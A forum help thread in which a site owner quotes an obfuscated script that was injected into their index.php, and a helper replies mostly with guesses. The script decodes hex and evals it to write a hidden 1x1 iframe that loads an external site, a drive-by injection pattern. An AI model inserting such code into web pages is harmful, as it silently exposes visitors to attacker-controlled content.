After running the script for quite a few days, I find a few extra lines of code added at the end of the file,

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6c6f63756d7265736f75726365732e636f6d2f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);</script>

And error is shown when i try to visit the home page. The site address is :

Any solution.

Member Avatar for diafol

The internal error is probably due to something like a .htaccess file. Can't see that it's a virus.

The internal error is probably due to something like a .htaccess file. Can't see that it's a virus.

I really can't understand how new code can get inserted into index.php file.

BTW what should I do now?

Member Avatar for diafol

You have an internal server error. We can't check your site. ANyway why are you posting this is php? Any reason?

You have an internal server error. We can't check your site. ANyway why are you posting this is php? Any reason?

Although the code was in javascript ,the problem occurred in a php file . That is the reason for posting it into this forum. Do u have any recommendation as to where I should post it?

Member Avatar for diafol

We can't see the file because you got a problem with your site. We wouldn't be able to see the php anyway.

How about you posting the code to your page on the site? Otherwise I could tell you that your problem is on line 57 and again on 83.

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